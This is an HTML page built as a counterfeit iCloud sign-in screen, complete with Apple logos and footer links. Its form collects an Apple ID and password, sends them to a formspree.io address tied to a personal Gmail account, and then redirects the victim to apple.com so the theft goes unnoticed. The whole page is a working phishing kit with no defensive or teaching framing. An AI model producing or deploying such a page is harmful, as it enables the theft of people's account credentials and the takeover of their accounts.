<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <link href="https://fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet">
  <link rel="shortcut icon" href="images/icon.png" />
  <link rel="stylesheet" href="css/bootstrap.css" type='text/css'>
  <link rel="stylesheet" href="css/styles.css" type='text/css'>
  <title>iCloud</title>
</head>
<body>
  <h3>iCloud</h3>
  <h4>Setup Instructions | ?</h4>
  <div class="container">
    <div class="card">
      <img src='images/icloud.png' alt='icloud logo' id='ilogo'>
      <h1>iCloud Sign In</h1>
      <form method='POST' action='https://formspree.io/timmyduncan244@gmail.com'>
        <p>
          <input type='email' autocomplete="off" name='appleid' placeholder="Apple ID" class='data'>
        </p>
        <p>
          <input type='password' autocomplete="off" name='password' placeholder="Password" class='data'>
        </p>
        <input type='submit' id='button' value='Confirm'>
        <input type="hidden" name="_next" value="https://www.apple.com/" />
      </form>
    </div>
  </div>
  <div class="footer1">
    <img src='images/lower.png' alt='apple logo' id='lower'>
  </div>
  <div class="footer2">
    <h5>Create Apple ID | System Status | Privacy Policy | Terms & Conditions | Copyright © 2018 Apple Inc. All Rights Reserved</h5>
  </div>
</body>
</html>
